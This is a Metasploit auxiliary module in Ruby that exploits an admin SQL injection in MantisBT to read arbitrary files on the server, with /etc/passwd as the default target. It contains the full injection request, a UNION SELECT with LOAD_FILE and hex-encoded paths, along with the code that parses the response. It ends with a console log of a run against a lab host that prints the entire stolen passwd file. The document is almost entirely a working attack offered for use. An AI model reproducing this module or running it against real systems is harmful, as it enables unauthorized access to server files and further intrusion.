## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "MantisBT Admin SQL Injection Arbitrary File Read", 'Description' => %q{ }, 'License' => MSF_LICENSE, 'Author' => [ ], 'References' => [ ], 'Platform' => ['win', 'linux'], 'Privileged' => false, 'DisclosureDate' => "Feb 28 2014")) register_options( [ OptString.new('FILE', [ true, 'Path to remote file', '/etc/passwd']), OptString.new('USERNAME', [ true, 'Single username', 'administrator']), OptString.new('PASSWORD', [ true, 'Single password', 'password']), OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/']) ], self.class) end def run post = { 'return' => 'index.php', 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'secure_session' => 'on' } resp = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/login.php'), 'method' => 'POST', 'vars_post' => post }) cookie = resp.get_cookies filepath = datastore['FILE'].unpack("H*")[0] resp = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/adm_config_report.php'), 'method' => 'POST', 'data' => "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-7856%27+UNION+ALL+SELECT+11%2C11%2C11%2C11%2CCONCAT%280x71676a7571%2CIFNULL%28CAST%28HEX%28LOAD_FILE%280x#{filepath}%29%29+AS+CHAR%29%2C0x20%29%2C0x7169727071%29%2C11%23&apply_filter_button=Apply+Filter", 'cookie' => cookie, }) resp.body =~ /qgjuq(.*)qirpq/ file = [$1].pack("H*") print_good(file) end end __END__ bperry@ubuntu:~/tools/metasploit-framework$ ./msfconsole Call trans opt: received. 2-19-98 13:24:18 REC:Loc Trace program: running wake up, Neo... the matrix has you follow the white rabbit. knock, knock, Neo. (`. ,-, ` `. ,;' / `. ,'/ .' `. X /.' .-;--''--.._` ` ( .' / ` , ` ' Q ' , , `._ \ ,.| ' `-.;_' : . ` ; ` ` --,.._; ' ` , ) .' `._ , ' /_ ; ,''-,;' ``- ``-..__``--` http://metasploit.pro =[ metasploit v4.8.0-dev [core:4.8 api:1.0] + -- --=[ 1178 exploits - 649 auxiliary - 186 post + -- --=[ 312 payloads - 30 encoders - 8 nops msf > use auxiliary/gather/mantisbt_admin_sqli msf auxiliary(mantisbt_admin_sqli) > set RHOST 172.31.16.109 RHOST => 172.31.16.109 msf auxiliary(mantisbt_admin_sqli) > set TARGETURI /mantisbt-1.2.16/ TARGETURI => /mantisbt-1.2.16/ msf auxiliary(mantisbt_admin_sqli) > set PASSWORD password PASSWORD => password msf auxiliary(mantisbt_admin_sqli) > show options Module options (auxiliary/gather/mantisbt_admin_sqli): Name Current Setting Required Description ---- --------------- -------- ----------- FILE /etc/passwd yes Path to remote file PASSWORD password yes Single password Proxies no Use a proxy chain RHOST 172.31.16.109 yes The target address RPORT 80 yes The target port TARGETURI /mantisbt-1.2.16/ yes Relative URI of MantisBT installation USERNAME administrator yes Single username VHOST no HTTP server virtual host msf auxiliary(mantisbt_admin_sqli) > run [+] root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:104::/var/run/dbus:/bin/false bperry:x:1000:1000:Brandon Perry,,,:/home/bperry:/bin/bash avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false dnsmasq:x:105:65534:dnsmasq,,,:/var/lib/misc:/bin/false whoopsie:x:106:114::/nonexistent:/bin/false avahi:x:107:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:111:121:RealtimeKit,,,:/proc:/bin/false saned:x:112:122::/home/saned:/bin/false speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh lightdm:x:114:123:Light Display Manager:/var/lib/lightdm:/bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false [*] Auxiliary module execution completed msf auxiliary(mantisbt_admin_sqli) >